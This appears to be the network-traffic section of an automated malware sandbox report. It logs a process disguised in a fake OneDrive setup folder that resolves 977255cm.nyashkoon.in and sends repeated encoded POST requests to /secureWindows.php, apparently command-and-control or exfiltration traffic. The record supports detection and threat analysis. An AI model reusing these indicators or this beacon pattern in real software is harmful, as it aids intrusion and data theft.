                                                        Oct 30, 2024 05:26:05.364305019 CET8050293188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.395031929 CET8050292188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.715236902 CET5029380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.720664024 CET8050293188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.763959885 CET8050292188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.764003992 CET5029280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.989790916 CET8050293188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:06.053368092 CET5029380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:06.296597958 CET8050293188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:06.412448883 CET5029380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:06.413297892 CET5029480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:06.418351889 CET8050293188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:06.418632030 CET8050294188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:06.421180010 CET5029380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:06.421216965 CET5029480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:06.421336889 CET5029480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:06.426618099 CET8050294188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:07.016738892 CET8050294188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:07.106638908 CET5029480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:10.299504995 CET5029480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:10.304867029 CET8050294188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:10.628377914 CET8050294188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:10.629594088 CET5029480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:10.635211945 CET8050294188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:10.635303020 CET5029480192.168.2.4188.114.96.3

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 30, 2024 05:22:06.677472115 CET5230853192.168.2.41.1.1.1
                                                        Oct 30, 2024 05:22:06.692018032 CET53523081.1.1.1192.168.2.4

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Oct 30, 2024 05:22:06.677472115 CET192.168.2.41.1.1.10x784Standard query (0)977255cm.nyashkoon.inA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Oct 30, 2024 05:22:06.692018032 CET1.1.1.1192.168.2.40x784No error (0)977255cm.nyashkoon.in188.114.96.3A (IP address)IN (0x0001)false
                                                        Oct 30, 2024 05:22:06.692018032 CET1.1.1.1192.168.2.40x784No error (0)977255cm.nyashkoon.in188.114.97.3A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • 977255cm.nyashkoon.in

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449730188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:06.743472099 CET309OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 344
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:07.090254068 CET344OUTData Raw: 05 07 04 01 06 0b 01 05 05 06 02 01 02 04 01 02 00 04 05 0c 02 0d 03 0f 03 01 0a 07 07 06 02 03 0c 02 06 0a 03 06 05 04 0f 04 02 05 06 0b 02 01 03 03 0b 00 0e 05 01 06 05 07 07 03 05 03 05 0a 05 01 0a 0b 05 52 06 02 0e 0e 0d 04 0f 0d 0e 01 07 53
                                                        Data Ascii: RS_WSR\L~C~s}_cr~]wvwR|~^wB^BZwXl|]J{^fIhTt@c^w_}O~V@@xmTbS
                                                        Oct 30, 2024 05:22:07.371233940 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:07.703283072 CET1236INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Re8ZNHgA7nd%2FuUSNOMnUrCb8bdniYVzOUDdrn9MrYqNd81ABD9HzQMJ9y9FX7RR8v%2Br%2B3sf0VhFy3vmH3gaaUEAEL84AKAZKjD5bt4GMBUZPOA2lXxWNFGobUL0dAp20wasG9SKjPSI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f57b9d96be4-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1312&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=653&delivery_rate=729471&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 35 31 34 0d 0a 56 4a 7e 06 7b 54 74 5a 78 4c 74 00 7c 61 6b 4b 7d 64 67 40 7f 70 69 4f 7a 4d 51 5c 6a 72 77 58 74 4d 72 50 79 62 79 07 62 76 64 48 69 5b 78 01 55 4b 72 53 60 5c 5a 58 7c 62 53 07 7c 64 69 52 79 66 7c 42 6a 5d 7f 01 76 71 76 5a 60 58 6d 48 7e 72 69 5d 7f 7c 63 53 7d 77 51 06 62 66 7b 06 7c 5b 75 4a 7d 59 69 4a 7b 59 78 43 78 77 70 01 79 6e 74 59 6d 62 73 5a 7a 60 72 02 7f 63 6c 03 78 67 77 59 69 72 51 03 76 4f 7c 49 7a 51 41 5b 7c 01 7f 50 6b 5f 65 08 61 42 52 4f 6f 52 64 03 77 70 75 54 7b 71 75 04 6a 42 76 03 6f 72 76 49 76 4d 5d 4a 75 4f 52 4f 77 4f 5c 50 7e 5d 79 5f 77 71 7d 01 76 65 51 50 7f 6c 66 5d 60 6f 70 04 7c 60 7c 02 78 6c 63 03 7b 5e 66 01 7c 6d 7f 51 74 77 6f 5e 69 62 75 50 7e 53 77 41 6c 43 61 5f 7f 62 69 06 7b 5d 46 51 7f 6c 55 52 7e 70 52 0d 6a 49 7e 01 6c 54 60 59 6f 62 64 48 7c 5f 5a 58 6a 67 5a 53 7c 4e 72 53 6e 5d 5d 5f 69 62 67 58 77 73 5b 51 7b 5c 79 4b 75 48 56 45 7e 66 7c 4d 7d 66 6d 40 74 5c 55 02 7f 4c 69 06 7c 77 50 0c 78 76 52 40 7c 63 63 03 75 62 71 07 77 [TRUNCATED]
                                                        Data Ascii: 514VJ~{TtZxLt|akK}dg@piOzMQ\jrwXtMrPybybvdHi[xUKrS`\ZX|bS|diRyf|Bj]vqvZ`XmH~ri]|cS}wQbf{|[uJ}YiJ{YxCxwpyntYmbsZz`rclxgwYirQvO|IzQA[|Pk_eaBROoRdwpuT{qujBvorvIvM]JuOROwO\P~]y_wq}veQPlf]`op|`|xlc{^f|mQtwo^ibuP~SwAlCa_bi{]FQlUR~pRjI~lT`YobdH|_ZXjgZS|NrSn]]_ibgXws[Q{\yKuHVE~f|M}fm@t\ULi|wPxvR@|ccubqwaSH~aP}l|@}gwv_szb}}`SxI`M{wxB{CcIxrxHzcT|NpJ{wd}rcua`~|w|It|qmNwlpOx|`KtNPz_q}B~zqbHwcuqRtOnNzwLmu[^O~|iBw
                                                        Oct 30, 2024 05:22:07.703303099 CET846INData Raw: 52 78 01 7f 4d 74 03 7b 6c 7b 03 7b 4e 7e 07 7d 6d 78 08 77 77 6c 02 7e 62 7e 09 7e 6d 5d 0b 78 43 62 06 7e 62 61 05 7f 70 74 42 7d 6c 70 0b 7d 70 68 4f 7e 49 72 4c 78 53 7b 07 7b 72 74 01 7f 5f 7f 03 7d 67 77 40 7e 60 57 0b 7a 73 5a 4d 7d 5c 78
                                                        Data Ascii: RxMt{l{{N~}mxwwl~b~~m]xCb~baptB}lp}phO~IrLxS{{rt_}gw@~`WzsZM}\xwcuO{qivX|~XVvqwbYJbqgPxXZ|sQJwbuwq__r}B`N}I{vqs{\y}^[IyghxYpLymQzL^zs~{]NZoIdI}bt[v_oZ~B^ZkIUPqPPbl|xoxwpfNzmG|lj_z\yvxBagx[L~Jx^b
                                                        Oct 30, 2024 05:22:07.838994980 CET285OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 384
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:07.970782042 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:07.971436977 CET384OUTData Raw: 57 57 59 51 50 58 53 52 58 57 50 59 55 50 5b 52 54 5c 5c 59 59 53 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WWYQPXSRXWPYUP[RT\\YYSZ\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z;3-?(9'/D.%-+/:4#*;':((%:0^6- F$,Z*
                                                        Oct 30, 2024 05:22:08.295356989 CET952INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a0OUlNTUD7UWWX%2BVcyI7jTW7vz0XknNI3WccgcmB6Ggy%2FPs%2BXdDntrZnon958%2B1K%2BUOB%2FfIfuh7yBA7y%2F%2Bp8EVEQBl6x7ceDs5Ng%2FrkpRzTNzzaDH0AMS9bQFn9%2B92czrh5Mr8XAbtk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f5b7e4a6be4-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1237&sent=8&recv=10&lost=0&retrans=0&sent_bytes=2132&recv_bytes=1322&delivery_rate=3840848&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 57 3c 38 28 13 26 1d 22 58 2b 2c 29 5e 2a 00 08 58 30 21 20 5d 24 3c 00 5f 3f 28 20 06 3e 24 2c 5f 28 1c 24 1f 21 25 3c 5f 3d 3b 2f 46 0c 10 27 5e 24 32 01 11 28 0d 0c 00 3d 3b 23 1a 34 1e 2e 59 3e 07 2f 1c 20 33 3c 13 24 21 39 0e 2d 2d 31 0b 39 43 31 00 3a 20 30 1f 3d 2a 21 57 08 14 22 58 25 02 2b 14 31 3d 0a 14 25 0c 0b 06 23 01 33 5a 21 2b 31 02 3f 02 20 52 26 20 3c 13 33 30 3c 0b 26 29 02 5c 3c 1f 30 0f 31 19 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&W<8(&"X+,)^*X0! ]$<_?( >$,_($!%<_=;/F'^$2(=;#4.Y>/ 3<$!9--19C1: 0=*!W"X%+1=%#3Z!+1? R& <30<&)\<01"R. V2XS0
                                                        Oct 30, 2024 05:22:08.327297926 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:08.457668066 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:08.457895041 CET1340OUTData Raw: 57 56 5c 54 55 5e 56 51 58 57 50 59 55 51 5b 5c 54 58 5c 5a 59 50 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WV\TU^VQXWPYUQ[\TX\ZYPZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%, ><;.Z0.,^&>0X/9 Z#:8&3Y(!['+%X.* F$,Z*
                                                        Oct 30, 2024 05:22:08.775423050 CET935INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4PWJ7iiiJbAJ8YmwvJrtBQVKAy1YdSvTq971FMtbvEuO87QK4GcXsmOtvvSAHpR2sY%2BSOe4DjGJJe1lJLmocHAaWqJ0XeIReAFuByFXPjvB2WskGtZnRImdtrVivOAGUnp3GHVoOmwk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f5e8a876be4-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1185&sent=13&recv=16&lost=0&retrans=0&sent_bytes=3109&recv_bytes=2948&delivery_rate=3840848&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 56 3f 38 24 50 26 30 35 00 3f 3c 3a 03 29 10 2e 58 33 0f 01 01 24 2c 2a 5f 3c 5d 3f 5f 3e 0a 2c 5e 3c 0b 24 58 20 35 20 58 2a 01 2f 46 0c 10 27 12 27 0b 33 53 2b 23 26 05 2a 38 06 05 37 0e 00 58 29 39 2b 1c 36 55 24 12 24 31 07 0b 2f 2d 35 0c 2e 1c 36 5a 2e 0d 0e 1f 2a 2a 21 57 08 14 21 01 25 3c 0d 1b 32 2e 3c 15 26 0c 3e 59 23 06 24 05 36 2b 2e 13 28 2b 3f 0e 25 0e 37 01 33 23 2b 54 26 2a 20 17 28 08 33 13 25 33 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&V?8$P&05?<:).X3$,*_<]?_>,^<$X 5 X*/F''3S+#&*87X)9+6U$$1/-5.6Z.**!W!%<2.<&>Y#$6+.(+?%73#+T&* (3%3"R. V2XS0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.449731188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:08.068360090 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:08.417546988 CET1076OUTData Raw: 57 5f 5c 56 50 59 56 52 58 57 50 59 55 5b 5b 5c 54 5e 5c 5d 59 56 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W_\VPYVRXWPYU[[\T^\]YVZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[, 2X?8-'=;@.C0]1=8*##9$%+<%6$^>-: F$,Z*)
                                                        Oct 30, 2024 05:22:08.654841900 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:08.970016956 CET782INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1bWiKJEmVLa%2FsHbGBAiONpCvus94gRsxjqUqeCuvwKxG5dq7b3Io7JVgiPPJHUL6uY8tZrU7dAS3enKNoWJj6Thk9XXsgkZgJ8QkITQWPjuEoDRcYZPCe8syLBNBR1dFjk0bFZTElQY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f5fc85f6be3-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1116&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1409931&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.449732188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:09.100539923 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:09.448961973 CET1076OUTData Raw: 57 53 59 50 55 5f 56 5d 58 57 50 59 55 5e 5b 5c 54 53 5c 5e 59 56 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WSYPU_V]XWPYU^[\TS\^YVZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^,#1?8"0>#.&0_2[8_;Z":4'9(+>$89 F$,Z*=
                                                        Oct 30, 2024 05:22:09.694474936 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:10.022835016 CET786INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wahM2noFiWwaepInj5W%2FjWvjTNt55KsnyuG24M4V%2BzwsEseIkv7WO%2B8GeqUyknRwL33ZBJYB2A7ky6mvohrumUQ9yREVZEFVneKG948l6ccmkpg81RQqKFBFlEHuf7HfbA9tQaiOGHU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f663e87e76a-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1354&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1099468&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.449733188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:10.166030884 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:10.511221886 CET1076OUTData Raw: 52 50 5c 5d 55 55 56 50 58 57 50 59 55 5e 5b 5c 54 52 5c 58 59 53 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RP\]UUVPXWPYU^[\TR\XYSZ[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&,V&<(.]0-'.% [1=X8:(4+X&/?6'8*/: F$,Z*=
                                                        Oct 30, 2024 05:22:10.752176046 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:11.071619987 CET794INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ouOl8zdgm%2FmH%2B49KX7y72JG0rFso4rZRRPTInW4f%2FhFpkX4iRTpvX7vDIyOLHQ%2Ba7JRKdAggWOb9FsRHA7Sso6RnhA0l6VBjApJC8RqZy5STc%2Bma1KLBN5Chqf%2BHElX0UwNrOkQMZ%2F8%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f6cd96447ae-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1206&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1317561&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.449734188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:11.290406942 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:11.636276007 CET1076OUTData Raw: 52 57 59 55 55 5a 56 54 58 57 50 59 55 5f 5b 59 54 5d 5c 5e 59 53 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RWYUUZVTXWPYU_[YT]\^YSZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^8"](-0=90\2',79;19?(65]'89 F$,Z*
                                                        Oct 30, 2024 05:22:11.884320021 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:12.219506979 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XxfE%2BQU8XGniVhlTNqh5wi9ED0vf11ZfZ2vvSfcsyUWjONWcAatJROrdckko%2FC3HtdfrywlySTEG6wIy12pqMF2OPJTPMQAlW9zSYCpcs70j%2FRw%2FOUiQJoWkgWEyxekgDZm03tPmI5M%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f73efd82cd6-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1304&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1120743&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.449735188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:12.355329990 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:12.714437962 CET1076OUTData Raw: 52 54 5c 55 50 5f 53 51 58 57 50 59 55 50 5b 5e 54 5f 5c 54 59 54 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RT\UP_SQXWPYUP[^T_\TYTZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&- 2=+"X07.(%=8^,"97X&+_(=&(99 F$,Z*
